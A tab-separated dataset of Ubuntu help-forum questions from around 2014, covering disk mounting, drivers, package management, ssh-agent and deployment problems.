432029	icon-theme.cache disk space ?	disk space is usually not too important , but i am wondering about the following on a fairly vanilla gnome ubuntu 13.10 install : -rw-r -- r -- 1 root root 13709124 oct 16 17:51 /usr/share/app-install/icon-theme.cache -rw-r -- r -- 1 root root 70994536 feb 23 00:19 /usr/share/icons/gnome/icon-theme.cache -rw-r -- r -- 1 root root 17314692 feb 23 00:19 /usr/share/icons/hicolor/icon-theme.cache -rw-r -- r -- 1 root root 120295812 oct 16 17:52 /usr/share/icons/highcontrast/icon-theme.cache -rw-r -- r -- 1 root root 41616 oct 16 17:52 /usr/share/icons/humanity-dark/icon-theme.cache -rw-r -- r -- 1 root root 954040 oct 16 17:52 /usr/share/icons/humanity/icon-theme.cache is 250mb of icon-theme.cache normal , or do i have a hidden rootkit here ? /iaw
432032	how to mark a usb drive with execute permissions	i keep trying to install garry 's mod onto my usb , but steam keeps saying `` new steam library folder must be mounted on a file-system with execute permissions . '' can someone please explain to me how to give the usb execute permissions . ( in the terminal preferably , for some reason the gui `` allow file as executable '' never shows up for me . )
432035	why does gnome-control-center have png images for a fingerprint reader ? does it have one and can i use it ?	so i was randomly looking at images on my computer and i found these in /usr/share/gnome-control-center/pixmaps : i did n't think ubuntu had any built in fingerprint reader support . so why are these here and did i miss something ? i have n't installed any fingerprint reader related packages that i know of .
432036	recovering deleted files from an ntfs partition	i have a 40gb ssd that used to have windows 7 on it . i originally installed linux mint on a second 640gb drive , and i have a 3rd 720gb drive for files and such . after working with linux for a while , i decided that i wanted to move it over to the ssd , as a 5400 rpm laptop hdd just was n't fast enough for my liking for my new os . i do n't need a working os , but i did want to keep it available for some of my files and settings . i used gparted to size down my linux partition to 120gb , then i created a 50gb ntfs partition on the 120gb mark , and created an ext4 partition on the ~170gb mark . i then used dd if=/dev/sdb1/ of=/sda2/ to move the files from my original ssd to the new ntfs . rebooted , and checked that everything was still there . good to go so far . then i wiped my ssd , installed ubuntu again on it . somehow i nuked my linux install and messed up everything . somewhere in the process of reformatting , i messed up my mbr on both drives . so i removed the partitions on both drives , got my mbr up and going just fine , and got ubuntu back on my ssd again no problem . only now did i just realize that my ntfs partition appears to be more or less gone . so far i attempted to use gparted to find and mount the ntfs partition which was a no-go . testdisk does n't seem to want to cooporate without an actual ntfs partition . a `` deep search '' lists it , but unable to list the files . foremost sounds like it would work , but i simply do n't have the available drive space without writing to the same drive that i 'm attempting to recover . the other issue is that the before installing linux , the drive was ~500gb full , and that 's a lot of useful files that i do n't want to recover . update : testdisk is able to find the correct partition ! ~21 % through a `` deep search '' it lists an ntfs partition 50gib large . only problem now is that if i try to list the files or do anything with the partition , testdisk crashes outright . the question marked as duplicate does not contain a related answer . i already mentioned that testdisk is unable to find the partition , but the individual files should still be there . the other question with answers from almost 2 years ago contain no helpful answer , and is in a different scenario .
432038	how do i increase the size of ubuntu which was installed through wubi ?	first , this is question is not same as this or this . it is similar but its somewhat different in a way . particularly , i want to change the path of where my disk copy is generated . the problem is : i know i have another drive where i have a lot of space and i want a new ( resized ) copy of my ubuntu to be generated at that path and then remove the older copy after verifying that my new copy boots correctly . currently my ubuntu is of 30 gigs and is at drive h : \ , i want to increase it to 40 gigs ( actually 50 gigs would be great but my h : \ partition is of 50 gigs and would be requiring to have some free space for swap ) . i want to store the intermediate copy in drive e : . i want to do this because my h : \ drive is 50 gigs ( 26 gigs filled ) and so i ca n't create a copy in the same drive . is it possible to do that by , say , modifying the script given here ? or is there any other way to do that ? any help would be appreciated . thanks !
432045	does software updater update apps installed by software center	i just want to know if i could install a bunch of apps through the software center and not have to add individual repositories to update every single app .
432055	alternative method to shrink ntfs	i am attempting to install ubuntu on my windows 7 laptop as a second os . my hard drive has multiple partitions on it already from the manufacturer . my guess is that this laptop is approximately 2 years old . my c : drive has about 102 gb available so i decided i would attempt to shrink this volume for my ubuntu installation . chkdsk has been run on the hard drive and defrag runs weekly so there is no fragmentation . when i attempt to shrink the drive , it tells me that i can only shrink it by a little more than 500 mb . i have never had to perform a system restore and would prefer not to . yet at this time , that seems like the best way to repartition the hard drive . any ideas ?
432056	i just installed ubuntu 13.10 and i get this message `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present ''	i just finished to install ubuntu 13.10 on my computer , is the first time that i use ubuntu , i tried to installing this operating system in the best way , i mean , i have installed ubuntu carefully ( this because im a nob and i wanted to prevent any errors ) i think that my ubuntu was installed properly but i still have a question , when i start my computer , and after that the ubuntu 's logo fades away appears this message : `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' then appears the login screen and when i enter my password i go to my desktop , the question i have is : this is normal ? what is what i have to do to solve this ? i have to reinstall my operating system ( i dont want to do that =s ) ?
432064	using grep to search texts with single quote ?	i am using gedit text editor with embedded terminal in ubuntu 12.04 . i 'm trying to search for some text using grep . i want to search for this line of code 'type ' = > 'select' i tried : grep -r '\'type\ ' = > \'select\ '' but grep did n't return any results . so can someone kindly tell me how to search for the code above ?
432073	why is `` * '' appended to apt-get purge package_name ?	when i run sudo apt-get purge -s clipit i see : $ sudo apt-get purge -s clipit reading package lists ... done building dependency tree reading state information ... done the following package was automatically installed and is no longer required : libappindicator1 use 'apt-get autoremove ' to remove it . the following packages will be removed : clipit* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . purg clipit [ 1.4.1-1.1ubuntu1 ] $ i see clipit* instead of just clipit . what does * mean here ? ( it 's not just clipit but with other packages as well . )
432074	default video player on ubuntu 13.10 has some issues with regards to pausing and playing	when i pause a video on the default player by pressing space bar , it jumps to a different section of the video ( usually , at an earlier point , sometimes back to the start of the video ) . it 's pretty annoying can i do something about it other than downloading a different player ?
432076	install ati radeon hd 3450 ( rv620 le ) in ubuntu 13.10 ( 64bits )	i failed to install the driver for my ati radeon hd 3450 ( rv620 le ) card in ubuntu 13.10 ( 64bit ) someone could help me with this , to know if they can or not . i have tried several ways to install the driver but always i have to reinstall the xorg again , because after not let me sign in ubuntu . i hope someone help me with this problem
432080	installing a telkom d-link modem driver	good day . i recently got a laptop with ubuntu 13.04 pre-loaded on it . im not familiar with this as i am so used to windows . i bought a modem from telkom . telkom mobile modem d-link model dwm-156 . my data service provider is virgin mobile . when i insert the telkom modem the laptop doesnt pick it up at all . when i insert my friend 's vodacom modem it picks it up immediately . what must i install to make this work ? also - i tried to install a modem driver but when i want to open it , it says `` could not open file '' . please assit me . is there a link you can send me where to download and also a step by step guide how to install ? thanks so much . rita
432082	its virtual box legal ?	i had this question i install virtualbox in order to learn about this program , and i found that had the oportunity to run windows , even windows 3.1 to windows 8 , my corcern is about the copyright , one of the reasons why , currently im an ubuntu user is because is opensource , and im against breaking the law ( i dont like that microsoft has privative code , but i respect his desicion ) the official site says that is opensource , but , how this can be opensource and at the same time offer windows ? ( windows allow this company to offer his program ? )
432086	will pure java written software be accepted in ubuntu software center	i just came across an article regarding submitting app to ubuntu software center http : //developer.ubuntu.com/publish/apps/other-forms-of-submitting-apps/commercial-software-faqs/ i 'm currently maintaining a open source stock market software . i would say around 80 % are windows users , although the software itself can be executed in linux too . i would like to increase adoption of linux users . hence , distributing the software in most popular linux distro will definitely help . i was wondering , whether a pure java written software will be accepted in ubuntu software center ? it requires jre6 and above .
432088	function keys not working after update	i installed an update on the 7th and now have some strange keyboard behaviour . after first installing the update and rebooting the keyboard layout changed to us but only for chromium - when i checked what keyboard layout was actually in use by the system it was still uk extended winkeys and the rest of the system was using that correct layout as far as i could tell from the limited testing i did . this morning the keyboard layout is fine but i 'm still having an issue where the f5 key is putting my laptop into standby rather than what it 's meant to be doing which is refreshing a page . the other function keys for volume , brightness , etc . are n't working either . the f*x* keys normally make the extended function work by default and you have to hold the fn button to make them work as traditional f*x* buttons with the exception of f5 which has no extended function but which is now putting my laptop into standby . the laptop is a hp e2 vision and i 'm running ubuntu 13.10 64-bit . the log in var/log/apt/history.log contains no entries for the update on the 7th but does for this morning when i ran the software updater so logging is working . i therefore do n't know what was actually installed by the updater .
432094	apt-get update throwing `` are you root '' error	when i execute apt-get update i get the following error : e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? how do i resolve this ?
432095	unable to play songs/videos from mounted android phone	i have successfully mounted my android ( jb ) phone with ubuntu 12.04 lts . everything is fine , when i connect my phone to laptop a window appears with memory card and phone memory . i can copy/paste files from system to phone and phone to system . now my problem is that i ca n't play songs/videos from memory card or phone memory . i am new to ubuntu . now only started to understand this platform . can anyone help me ? ? ?
432096	how to turn off proprietary ati drivers using recovery mode ?	i have setup just like in this question - amd a10-7850k apu and an asus a88xm-plus motherboard . instruction by ruben bakker tells me how to install what i need , but it does not tell me how to clean up my system after a failed attempt made on my own . i installed drivers using additional drivers manager . restarted , and now every time i boot all i can get is a black screen . keyboard and mouse are trapped and i ca n't switch to text console , and so on . i can boot to recovery mode but what do i do there ? in the old times when i was using gentoo i would just edit xorg.conf to switch to an open driver , but i ca n't find anything like that in my ubuntu . and i 'm sure there is no text-based version of additional drivers manager .
432098	installing rags on ubuntu	hullo , i 'm a near complete ubuntu noob , and even more so when it comes to wine . i 'm trying to get rags to work in wine , i 've tried just wine itself and i get invalid parameter when trying to run it . when i try to run it through play on linux it crashes . running debug tells me it is looking for mono . reading online i 've tried a few fixes , but now i 've run into a problem where it 's not working as i 'm on a 64 bit system . i 'd simply point it to a 64 bit install for the .net framework through terminal , but i 've gotten as far as i can myself at the moment and am stuck .
432099	ehterpad configure script not finding the existing dir given via prefix option	i am following the official ubuntu guide to install etherpad from here . when it asks to download and extract the latest version of etherpad , i do so . the version i downloaded is node-v0.10.26.tar.gz . since i am following the guide , the path of extracted directory is /opt/etherpad/local/node-v0.10.26 the guide then asks me to run configure script : `` ./configure –-prefix= $ home/local/node '' on doing so i get the following error : gyp : –-prefix=/opt/etherpad/local/node not found ( cwd : /opt/etherpad/local/node ) while trying to load –-prefix=/opt/etherpad/local/node error running gyp so i then rename the node-v0.10.26 directory to simply `` node '' and then run the command again and i again get the same error : gyp : –-prefix=/opt/etherpad/local/node not found ( cwd : /opt/etherpad/local/node ) while trying to load –-prefix=/opt/etherpad/local/node error running gyp if instead of $ home i use /opt/etherpad , as in `` ./configure –-prefix=/opt/etherpad/local/node '' i still get the same error . any clues why is it giving the error ? os is ubuntu 12.04.4 lts .
432103	ubuntu 12.04 lts fails to load unity . nvidia persistence daemon [ fail ]	ubuntu 12.04 fails to start when my drivers are installed for nvidia . when i’ve a ubuntu 12.04 lts on my laptop without the drivers installed , everything works just fine . but when i install my nvidia drivers and bumblebbee it start to the terminal . what do i’ve to do ? these are the errors i’ve when booting ubuntu through recovery mode . because i get on low graphic mode when i do n't enter grub . could not write bytes : broken pipe could not write bytes : bad file descriptor nvidia persistence daemon [ fail ] i’ve a asus ux32vd with i7 and nvidia [ geforce gt 620m ] i have spent one week googling around . none of the solutions i found helps . help please : )
432105	where do i get drivers for my lenovo ideatab a3000-h ?	i need to back-up my tablet ... where do i get the drivers for it ? its a lenovo ideatab a3000-h i 'm using ubuntu 12.04 when i plug my tablet into my laptop , i ca n't see it , so i assume i need the drivers for it ? thanks
432108	ap-hotspot fail	i 've been trying to create an ap wireless network from a usb wifi transmitter . i have been using ap-hotspot to do so . it has got no further than this message on debug mode : adding system startup for /etc/init.d/dnsmasq ... /etc/rc0.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc1.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc6.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc2.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc3.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc4.d/k85dnsmasq - > ../init.d/dnsmasq /etc/rc5.d/k85dnsmasq - > ../init.d/dnsmasq * restarting dns forwarder and dhcp server configuration syntax check ... fail ! net.ipv4.ip_forward = 1 iptables v1.4.18 : empty interface is likely to be undesired try `iptables -h ' or 'iptables -- help ' for more information . it hangs at this point . where would i start looking to make it work ? i tried disabling my firewall ( just incase ) but nothing i seem to do will make it work . i am running on ubuntu gnome 13.10 thanks for your help .
432111	wine pdf association issue over ubuntu 13.10	i want to associate `` pdf xchange viewer '' , one of the windows based pdf viewer , as the default application for all the pdfs in ubuntu 13.10 . right click over nautilus works fine and shows the wine pdf xviewer option and can able to open pdf . however setting default options does not work.even it does not show the `` wine option '' in the pop-up that appears when you try to set default application . my `` .desktop '' file for wine is as follows : - [ desktop entry ] type=application name=pdf-xchange viewer mimetype=application/pdf ; exec=export wineprefix= '' /home/cdot/.wine '' wine start /progidopen pdf-xchangeviewer.1 % f nodisplay=true startupnotify=true icon=c055_pdfxcview.0 so i again try to use `` mimeopen '' command as a workaround . mimeopen -d cc_availability.pdf please choose a default application for files of type application/pdf 1 ) pdf-xchange viewer ( wine-extension-pdf ) 2 ) print preview ( evince-previewer ) 3 ) document viewer ( evince ) 4 ) other ... use application # 1 opening `` cc_availability.pdf '' with pdf-xchange viewer ( application/pdf ) however , instead of making wine as a default application , nautilus takes any random application as a default and open pdf file with that . please guide me if i am doing something wrong .
432112	applications run but does not show up in ubuntu 13.10	i do not know why but some applications run after i clicked but it does not display , like texmaker , when i double click on the tex file , then it shows immediately the texmaker figure but then nothing happen . please figure it out for me . thanks .
432120	unable to share folder on mounted hard disk	i am using ubuntu 13.10 desktop version 64 bit and already installed samba . i mounted an extend hard disk onto /media/dongchirua/ ( in this case , dongchirua is my username ) . hard disk 's label is backup so the path is /mount/dongchirua/backup . i created a folder name test on backup and shared by using gui ( properties > > share ) . i marked the guest access option but the fact is no one can access because permission . i tested a folder in /home/dongchirua and everything is ok. at first , i changed owner and group owner by using chown dongchirua : dongchirua /media/dongchirua and /media/dongchirua/backup but it did not work . could you please help ?
432122	how to extract audio from video ? ? ( not converting video into audio file ? ? ? )	it sounds strange to ask this question as it has been asked before . however the answers only refer to converting video files into audio files . i would like to get into the container and separate the video file from the audio file and only keep the audio file . simple conversion of the container to the audio file , makes the file way to big , and containing more info than i need . converting the whole container file ( avi , mpg , wav ... .. ) etc is easy enough but that does not do the trick . preferably i would like to do this without using the terminal . working with the latest version of ubuntu at this moment ( march 2014 ) . also please do not suggest any cross platform ideas . i run my computer on only ubuntu , there is nothing left of any other os . h.w . roos
432128	unable to connect to running ssh-agent	i connect to a long-running screen session on ubuntu 12.04 server , and use that as a jump box for other things i connect to . as a result , i want a long-running ssh-agent on that machine . to that end , i have the following in my .bashrc : pgrep -u pdickey ssh-agent > /dev/null || ssh-agent -a $ home/.ssh-auth-sock ssh_auth_sock= $ home/.ssh-auth-sock export ssh_auth_sock as long as my screen session never disconnects , this works perfectly . i can spawn new screens , and they all get the same agent . trouble arises when i disconnect from the machine that has the original ssh session . on a reconnect , i get the following : $ ssh-add -l could not open a connection to your authentication agent . everything i 've found about this seems to indicate that this happens when the agent is n't running , but i can verify that it is running , and the $ ssh_auth_sock variable is set : $ ps -fu pdickey | grep ssh-agent pdickey 435 1 0 04:11 ? 00:00:00 ssh-agent -a /home/pdickey/.ssh-auth-sock $ echo $ ssh_auth_sock /home/pdickey/.ssh-auth-sock so why the heck is n't it connecting ? i own the socket : $ ls -la .ssh-auth-sock srw -- -- -- - 1 pdickey pdickey 0 mar 10 04:33 .ssh-auth-sock= i 've even gone so far as to strace the process , which after sifting through all the library loads , provides the mostly-unhelpful bit of information : 64962 connect ( 3 , { sa_family=af_file , path= '' /home/pdickey/.ssh-auth-sock '' } , 110 ) = -1 econnrefused ( connection refused ) this is now the limit of my linux / ubuntu / ssh knowledge . why would a socket that i own , created by a process i own , refuse connection from another process i own ?
432130	how to get screenshot of a user in ubuntu ?	i am using ubuntu 12.04 lts . i want to get the screenshot of a particular user in ubuntu , is there any tools that will work from terminal ?
432131	not showing any applications in kde application launcher	not showing any application in kickoff and k-launcher in desktop . i doubt if i have installed lubuntu , xubuntu , gnome theme . please show me the way to show applications without removing anything .
432133	automatic mount ext4 hard disk on boot problem	i used blkid and its output : /dev/sda1 : uuid= '' 54221cee221cd6b8 '' type= '' ntfs '' /dev/sda2 : label= '' data '' uuid= '' fe10555e10551ec9 '' type= '' ntfs '' /dev/sda5 : uuid= '' fc63b7f3-9b03-4e85-a0ce-fa638eeff40b '' type= '' ext4 '' /dev/sda6 : uuid= '' f498cfb8-519f-462d-ae26-2fabb709ad8b '' type= '' swap '' /dev/sdb5 : label= '' backup '' uuid= '' e8572aae-27e7-4d16-84fa-81c437529373 '' type= '' ext4 '' i want to mount sdb5 automatically so i edited the fstab like this uuid=fc63b7f3-9b03-4e85-a0ce-fa638eeff40b / ext4 errors=remount-ro 0 1 uuid=f498cfb8-519f-462d-ae26-2fabb709ad8b none swap sw 0 0 uuid=e8572aae-27e7-4d16-84fa-81c437529373 /media/dongchirua/ ext4 uid=1000 , gid=1000 , umask=0022 , sync , auto , rw 0 0 ( /media/dongchirua/ is place where i want to mount to ) but when system start , a message shows an error on sdb5 and press s to skip it ? could you please help ?
432134	installing ubuntu 13.10 on a hp system pre-installed with windows 8	i do n't want dual boot system with windows 8 . i would like to replace it with ubuntu 13.10 . what would be a safe method to do so . i 've tried to have the dual boot . but despite running boot repair , the problem did n't get resolved . i do n't need windows anyway .
432135	custom usb distro problem : can not connect to the internet	this is my first thread and i would like to apologize for my lack of knowledge regarding forum-based rules . i intend to make a custom usb ubuntu 13.10 distribution with the applications i need . i did everything i needed , but there is one problem : i can not connect to the internet . i created the distribution after installing the programs i needed ( like gimp and google earth ) using `` remastersys '' and `` ubuntu startup disk creator '' . whenever i wish to acces the internet while booted from usb it says there is a connection problem . i can connect to my router and the router gives me a dhcp address . i tried connecting using wired , wireless and usb wireless dongle . however , i pinged google using terminal and i had 100 % responses with no delay . i am really out of solutions and really need this usb ubuntu to work on the internet . thank you for any advice you can give me !
432136	how can i confirm my name on a local network ?	my local network name is usually myhostname.local , but sometimes other people on the network ca n't access me at that address and i have to give them my network ip address ( which changes ) . how can i confirm my name on the network i am currently logged in to ?
432141	x does not start on boot	after system upgrade to 13.10 there is no gui at startup . i can login successfully and startx or start lightdm , but it should be done automatically . i tried following these instructions and did : cat /etc/x11/default-display-manager ( output : /usr/sbin/lightdm ) sudo dpkg-reconfigure lightdm gedit /etc/init/lightdm.conf and before command exec lightdm added sleep 5 nothing seems to help the situation . how can i fix or debug this ?
432145	avoid hidden files while calculating disk usage ?	i am using ubuntu ltsp , i want to find tje size of my home folder using , du command , i try du -hs /home/students/cs2011/cs1105 , but it shows more size than what i get by taking the properties
432153	after mounting the ntfs partition , all files are readonly	i made the following changes in /etc/fstab , after doing this i cant create any files in any of the partitions and the existing files are readonly . pls help me out . this is my /etc/fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda10 during installation uuid=89e6ce75-1460-4c7e-ab26-ada11484cf4e / ext4 errors=remount-ro 0 1 # swap was on /dev/sda11 during installation uuid=fb568186-5d39-4a60-9412-c254a0489490 none swap sw 0 0 /dev/sda5 /media/educational ntfs nls=iso8859-1 , umask=002 0 0 /dev/sda6 /media/entertainment ntfs nls=iso8859-1 , umask=002 0 0 /dev/sda7 /media/projects ntfs nls=iso8859-1 , umask=002 0 0 /dev/sda9 /media/sda9 swap noauto , sw 0 0 /dev/sda8 /media/sda8 ntfs nls=iso8859-1 , noauto , umask=000 0 0 am trying to mount educational , entertainment and project partitions . if i go into project partition , cd /media/project and when i do ls -l manu @ manu-ideapad-z570 : /media/projects/programs $ ls -l total 20 drwxrwxr-x 1 root root 4096 oct 22 15:02 beagle -rwxrwxr-x 1 root root 2943 feb 28 21:37 checksum.c drwxrwxr-x 1 root root 0 sep 5 2013 git drwxrwxr-x 1 root root 4096 apr 2 2013 oops_programs drwxrwxr-x 1 root root 4096 mar 3 10:22 os drwxrwxr-x 1 root root 0 jan 28 18:06 python drwxrwxr-x 1 root root 0 mar 1 00:34 software_house drwxrwxr-x 1 root root 4096 feb 17 10:09 test drwxrwxr-x 1 root root 0 feb 5 13:37 uttara manu @ manu-ideapad-z570 : /media/projects/programs $ but when i open the file checksum.c using vim it says readonly file . i tried doing chown and chmod , but also its always readonly . what should i do i want to access these files make changed and even create new files in there , can anyone please help me out ? ?
432155	ubuntu 13.10 - can not print with hplaserjet p1006 - port usb	printer hplaserjet p1006 not working in ubuntu 13.10 .
432156	ldap client against windows 2003 server	i have followed this guide to get my ubuntu 13.04 to authenticate users against active directory on a win2003-server . after a little trial , error and corrections , i no longer have any errors in auth.log and everything seems to be ok - the only problem is that getent passwd etc shows that no users have been imported and no home directories have been made . if i run the ldap test-tool , it works fine . what on earth could i have missed ?
432163	how to start git-gui ?	i 've installed git-gui tool via sudo apt-get install git-gui . but how do i start it ? trying with search or git-gui command did not find and ui tool for git .
432167	grey screen background during logon	earlier during log on my screen 's background used to be purple , but now it has become grey in colour , is it ok ? but can anyone tell me why does did it happen.and , how can i switch from lubuntu to ubuntu ? which is better lubuntu or ubuntu ? and how can i use the remote login feature of ubuntu 13.10 ?
432169	lenovo y580 reinstall network drivers	i had some issues with wifi with my lenovo y580 , i could connect my home wifi but it would disonnect me after few minutes and i was n't able to reconnect i have ubuntu 12.04 and i believe my network card is `` ar8161 gigabit ethernet '' changes i have been doing before it stopped working at all : 191 lspci -vv | grep atheros 192 sudo apt-get install build-essential linux-headers-generic linux-headers-`uname -r` 193 wget -o- http : //linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 | tar -xj 194 cd compat-wireless-2012-07-03-pc 195 ./scripts/driver-select alx 196 make 197 sudo make install 198 sudo modprobe alx it would be great if i could revert this change so ubuntu would use the previous standard driver . then i could at least connect to some wifi and maybe this problem was router 's issue and not my network driver one thanks for any help
432171	how to install ubuntu from the .iso file on a windows-7 laptop	i use a dell inspiron n5110 laptop . and recently windows 7 is installed on it . i have downloaded the ubuntu desktop .iso file . how can i install it to my laptop ? i 've brought a new dvd . please can any one tell me step by step . what to do to keep both operating systems ?
432176	snapshot of a lxc container	please , is it possible to migrate a container to a new node and restart it there ? and how ? should i take a snapshot of the container or i transfer the repository to the new node ? ( beginner with lxc container ) thank you so much .
432177	ubuntu saucy salamander 13.10 webcam not working	i have been using ubuntu here and there and sometimes switching back to windows and coming back using ubuntu . i was wondering , why is it that i ca n't use my webcam ? i 'm using a samsung rv511 and my webcam was working fine before that when i used ubuntu 12.04 , 12.10 , and 13.04 but i 've no idea what happen with ubuntu 13.10 . can anyone help me ?
432178	i want to reinstall ubuntu but i do not know which partitions to delete	so , i went to gparted and i know that i must delete the ext4 partition and the linux swap partition ( image above ) . my question is if that unknown partition has anything to do with linux . hope you can answer my question . thank you in advance .
432180	error mounting sd card when returning from suspend	i have a 128 gb sd card that i use for permanent storage in my lenovo thinkpad x1 . i 've mounted it in /etc/fstab with this line : uuid=37733366-e936-41df-983a-f084352b3a5b /home/kristian/sd128gb auto defaults 0 0 which works just fine . until i put my machine to suspend , upon returning i get the error : error mounting system-managed device /dev/mmcblk0p1 : command-line `mount `` /home/kristian/sd128gb '' ' exited with non-zero exit status 32 : mount : file exists the mount point directory is empty , but attempting to mount it gives $ mount sd128gb/ mount : according to mtab , /dev/mmcblk0p1 is already mounted on /home/kristian/sd128gb syslog gives kernel : [ 271462.070388 ] ext4-fs warning ( device mmcblk0p1 ) : __ext4_read_dirblock:908 : error reading directory block ( ino 2 , block 0 ) kernel : [ 271462.070410 ] ext4-fs warning ( device mmcblk0p1 ) : __ext4_read_dirblock:908 : error reading directory block ( ino 2 , block 0 ) kernel : [ 271462.091100 ] ext4-fs warning ( device mmcblk0p1 ) : __ext4_read_dirblock:908 : error reading directory block ( ino 2 , block 0 ) kernel : [ 271462.091130 ] ext4-fs warning ( device mmcblk0p1 ) : __ext4_read_dirblock:908 : error reading directory block ( ino 2 , block 0 ) unmounting and mounting it again works , but this is a hassle to do every time i return from suspend -- especially as i use it for permanent storage , it does n't feel very reliable to work with data on a partition that frequently unmounts . the `` file exists '' message seems obscure , and googling it , it seems like not many people get the same error message . can i fix this permanently ? or , alternatively : how could i make an ugly fix with a remount command that runs every time i return from suspend ?
432185	sublime text editor suddenly closed	when i open too many files on sublime . it suddenly closed without asking for save file . i am using ubuntu 13.10 . and my laptop is dell inspiron 9300 .32 bit , 1 gb ram , 80 gb harddisk , centrino processor . thanks in advance .
432187	how can i deploy my local juju charm with amulet framework ?	i use amulet as testing framework for charms which we developing . i 've already tried to reproduce an example , provided on https : //juju.ubuntu.com/docs/tools-amulet.html and it 's work fine . but now i 'm trying to do the same basic setup for charm , which was developed and stored on hard drive ( 'cf-nats ' charm was cloned from github ) . here the list of my actions ( i use local environment for deploying ) : python 3.2.3 ( default , feb 27 2014 , 21:31:18 ) [ gcc 4.6.3 ] on linux2 type `` help '' , `` copyright '' , `` credits '' or `` license '' for more information . > > > import os > > > import amulet > > > import requests > > > d = amulet.deployment ( series='trusty ' ) > > > d.add ( 'cf-nats ' , charm = '/home/ubuntu/cf-charms/charms/trusty/cf-nats ' ) > > > d.setup ( ) and i got the next output : 2014-03-10 10:56:09 starting deployment of local traceback ( most recent call last ) : file `` /usr/bin/juju-deployer '' , line 9 , in < module > load_entry_point ( 'juju-deployer==0.2.5 ' , 'console_scripts ' , 'juju-deployer ' ) ( ) file `` /usr/lib/python2.7/dist-packages/deployer/cli.py '' , line 118 , in main run ( ) file `` /usr/lib/python2.7/dist-packages/deployer/cli.py '' , line 204 , in run importer.importer ( env , deployment , options ) .run ( ) file `` /usr/lib/python2.7/dist-packages/deployer/action/importer.py '' , line 142 , in run self.get_charms ( ) file `` /usr/lib/python2.7/dist-packages/deployer/action/importer.py '' , line 47 , in get_charms no_local_mods=self.options.no_local_mods ) file `` /usr/lib/python2.7/dist-packages/deployer/deployment.py '' , line 112 , in fetch_charms charm.fetch ( ) file `` /usr/lib/python2.7/dist-packages/deployer/charm.py '' , line 98 , in fetch self.vcs.branch ( ) attributeerror : 'nonetype ' object has no attribute 'branch' traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python3/dist-packages/amulet/deployer.py '' , line 175 , in setup self.juju_env ] , cwd=self.deployer_dir ) file `` /usr/lib/python3.2/subprocess.py '' , line 489 , in check_call raise calledprocesserror ( retcode , cmd ) subprocess.calledprocesserror : command ' [ 'juju-deployer ' , '-w ' , '-c ' , '/tmp/amulet-juju-deployer-myb41r.json ' , '-e ' , 'local ' , 'local ' ] ' returned non-zero exit status 1 i 've also tried to deploy the same charm manualy with juju command line interface and it 's work . here is the output from d.schema ( ) > > > d.schema ( ) { 'local ' : { 'services ' : { 'cf-nats-sentry ' : { '_has_sentry ' : true , 'expose ' : true , 'branch ' : '/tmp/sentry-sub_16ocg4/cf-nats-sentry ' } , 'cf-nats ' : { '_has_sentry ' : true , 'branch ' : '/home/ubuntu/cf-charms/charms/trusty/cf-nats ' } , 'relation-sentry ' : { 'expose ' : true , 'branch ' : '/tmp/sentry_5cdg4t/relation-sentry ' } } , 'series ' : 'trusty ' , 'relations ' : [ [ 'cf-nats : juju-info ' , 'cf-nats-sentry : juju-info ' ] ] } } what is wrong in my code ? how can i deploy my local charm with amulet framework ? what kind of python packages should be installed ? thank you in advance .
432188	xorg 1.15 and amd 13.1 legacy	i have a question : will my ati radeon 5145 ( 4570 ) work with ubuntu 14.04 ? i need proprietary driver for good energy control . i have laptop . or i need to downgrade xorg ?
432191	how to run software on client machine installed on server machine ?	i have two machine one with ubuntu 12.04 server and another with ubuntu 12.04 client . i am having some software installed on ubuntu server machine . i need to use this software on client machine wihtout installing .
432193	having trouble installing ubuntu one	i 've just installed ubuntu twice from the software center , and it tells me it 's installed , but when i open it ubuntu one asks me to install , i click on the install button and i get a message back each time . i could do with a bit of help if anyone could lend a hand . another thing , this swiftfox . i tried to install this from the terminal with an error message similar or the same as that below . w : failed to fetch http : // getswiftfox.com/builds/debian/dists/unstable/non-free/binary-1368/packages e : some index files failed to download . they have ignored , or old ones used instead . install or close any help will be appreciated .
432194	installing xen hypervisor on ubuntu 12.04 and 13.10	i have tried many time to install xen on different ubunut versions , but i have got two errors : when installing xen 4.1 on ubuntu ( the ubuntu is the host system ) and use # sudo xm list , the error is ca n't find hypervisor information in sysfs . when when installing xen 4.1 on ubuntu on vmware player ( the ubuntu is the vm on host system windows 7 ) . after entering my password to login , it seems the system stuck for a while then nothing displayed on the desktop . please i need urgent help ? thank you so much .
432197	tep -- 220m thermal printer drivers for ubuntu	i 'm running 12.04 and i need drivers for tep-220m thermal printer . any leads ? ?
432199	running an executable with fixed execution-time and memory limit and getting exit-code	what is the best way to run an executable with execution-time and memory ( ram ) limit ( e.g . 2.5 seconds and 32768 kb ) ? also i need to get the exit-code if it exits without violating time and memory limits . otherwise it should be killed and i need to know which limit it violated ( e.g . memory_limit_exceeded , time_limit_exceeded ) . thanks in advance .
432200	m4 preprocessor `` error : end of file in string ''	i 'm getting this error msg : m4 : myperlscript.pl:77 : error : end of file in string when trying to use m4 to replace a string in some perl scripts . i 'm making the call inside a makefile . $ ( outdir ) / % : % .pl m4 blah/thing.m4 $ < > $ @ chmod +x $ @ i made sure that thing.m4 exists and is in the right place .
